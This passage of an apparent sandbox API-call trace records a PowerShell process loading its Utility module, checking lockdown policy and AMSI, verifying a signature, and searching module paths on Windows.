lpOverlapped=0x0 | out: lpBuffer=0x221e180*, lpNumberOfBytesRead=0x1b7dd8d8*=0x950, lpOverlapped=0x0) returned 1 [0187.484] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dd858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dd858*=0) returned 0x950 [0187.484] ReadFile (in: hFile=0x6b8, lpBuffer=0x221d638, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x1b7dd8d8, lpOverlapped=0x0 | out: lpBuffer=0x221d638*, lpNumberOfBytesRead=0x1b7dd8d8*=0x0, lpOverlapped=0x0) returned 1 [0187.485] SetFilePointer (in: hFile=0x6b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dd858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dd858*=0) returned 0x950 [0187.485] ReadFile (in: hFile=0x6b8, lpBuffer=0x221e180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dd8d8, lpOverlapped=0x0 | out: lpBuffer=0x221e180*, lpNumberOfBytesRead=0x1b7dd8d8*=0x0, lpOverlapped=0x0) returned 1 [0187.485] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2780 [0187.485] GetSystemDirectoryW (in: lpBuffer=0x1a9b2780, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0187.485] CoTaskMemFree (pv=0x1a9b2780) [0187.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7dd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0187.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7dd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0187.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd7f0) returned 1 [0187.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd8d0 | out: lpFileInformation=0x1b7dd8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0187.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd7b0) returned 1 [0187.485] WldpGetLockdownPolicy () returned 0x0 [0187.485] GetSystemInfo (in: lpSystemInfo=0x1b7dd930 | out: lpSystemInfo=0x1b7dd930*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0187.486] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dd838 | out: phkResult=0x1b7dd838*=0x688) returned 0x0 [0187.486] RegQueryValueExW (in: hKey=0x688, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7dd888, lpData=0x0, lpcbData=0x1b7dd880*=0x0 | out: lpType=0x1b7dd888*=0x0, lpData=0x0, lpcbData=0x1b7dd880*=0x0) returned 0x2 [0187.486] RegCloseKey (hKey=0x688) returned 0x0 [0187.486] CloseHandle (hObject=0x6b8) returned 1 [0187.486] CoCreateGuid (in: pguid=0x1b7dd9e8 | out: pguid=0x1b7dd9e8*(Data1=0xa317a380, Data2=0x6e83, Data3=0x4eb7, Data4=([0]=0x94, [1]=0x5b, [2]=0xf8, [3]=0x54, [4]=0x66, [5]=0x87, [6]=0x6d, [7]=0xdb))) returned 0x0 [0187.486] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.487] AmsiOpenSession () returned 0x0 [0187.487] AmsiScanString () returned 0x80070015 [0187.491] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd000, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.491] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd3b0) returned 1 [0187.491] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd490 | out: lpFileInformation=0x1b7dd490*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0187.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd370) returned 1 [0187.491] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcf20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.492] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.492] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dce50, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd290) returned 1 [0187.492] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7dd370 | out: lpFileInformation=0x1b7dd370*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0187.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd250) returned 1 [0187.492] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dcd40, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd220) returned 1 [0187.492] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6b8 [0187.602] GetFileType (hFile=0x6b8) returned 0x1 [0187.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd190) returned 1 [0187.602] GetFileType (hFile=0x6b8) returned 0x1 [0187.602] WTGetSignatureInfo () returned 0x0 [0187.630] CertDuplicateCertificateContext (pCertContext=0x1a8ab6b0) returned 0x1a8ab6b0 [0187.630] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dd2b8 | out: phkResult=0x1b7dd2b8*=0x6e8) returned 0x0 [0187.630] RegQueryValueExW (in: hKey=0x6e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dd308, lpData=0x0, lpcbData=0x1b7dd300*=0x0 | out: lpType=0x1b7dd308*=0x1, lpData=0x0, lpcbData=0x1b7dd300*=0x56) returned 0x0 [0187.630] RegQueryValueExW (in: hKey=0x6e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7dd308, lpData=0x2247fb0, lpcbData=0x1b7dd300*=0x56 | out: lpType=0x1b7dd308*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7dd300*=0x56) returned 0x0 [0187.630] RegCloseKey (hKey=0x6e8) returned 0x0 [0187.630] CoTaskMemAlloc (cb=0x10) returned 0x1a8e1b70 [0187.631] CoTaskMemAlloc (cb=0x50) returned 0x1a9b5b80 [0187.631] WinVerifyTrust () returned 0x0 [0187.631] CoTaskMemFree (pv=0x1a9b5b80) [0187.631] CoTaskMemFree (pv=0x1a8e1b70) [0187.631] CertFreeCertificateContext (pCertContext=0x1a8ab6b0) returned 1 [0187.631] CloseHandle (hObject=0x6b8) returned 1 [0187.682] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd570, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.682] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0187.683] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0187.683] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.683] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.683] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc550, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.683] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7dc560, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0187.686] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dc590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0187.686] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x1b7dc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0187.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc9f0) returned 1 [0187.686] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b7dcad0 | out: lpFileInformation=0x1b7dcad0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc9b0) returned 1 [0187.686] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0187.686] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0187.686] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b2780 [0187.686] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1a9b2780, nSize=0x105 | out: lpBuffer="") returned 0x97 [0187.686] CoTaskMemFree (pv=0x1a9b2780) [0187.686] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dc370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0187.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc7b0) returned 1 [0187.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc890 | out: lpFileInformation=0x1b7dc890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc770) returned 1 [0187.688] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0187.692] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dc370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0187.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc7b0) returned 1 [0187.692] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc890 | out: lpFileInformation=0x1b7dc890*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0187.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc770) returned 1 [0187.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dc370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0187.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc7b0) returned 1 [0187.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc890 | out: lpFileInformation=0x1b7dc890*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0187.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc770) returned 1 [0187.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b7dc1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0187.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc610) returned 1 [0187.693] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc6f0 | out: lpFileInformation=0x1b7dc6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc5d0) returned 1 [0187.694] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0187.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b7dc1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0187.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc610) returned 1 [0187.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc6f0 | out: lpFileInformation=0x1b7dc6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0187.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc5d0) returned 1 [0187.696] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0188.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b7dc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0188.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b7dc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0188.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b7dbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0189.175] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0189.175] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0189.175] CoTaskMemAlloc (cb=0x20c) returned 0x1a9f4670 [0189.176] GetSystemDirectoryW (in: lpBuffer=0x1a9f4670, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0189.176] CoTaskMemFree (pv=0x1a9f4670) [0189.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7dbca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0189.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7dbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0189.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc280) returned 1 [0189.176] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc360 | out: lpFileInformation=0x1b7dc360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0189.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc240) returned 1 [0189.176] WldpGetLockdownPolicy () returned 0x0 [0189.176] GetSystemInfo (in: lpSystemInfo=0x1b7dc3c0 | out: lpSystemInfo=0x1b7dc3c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0189.177] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7dc2c8 | out: phkResult=0x1b7dc2c8*=0x6b8) returned 0x0 [0189.177] 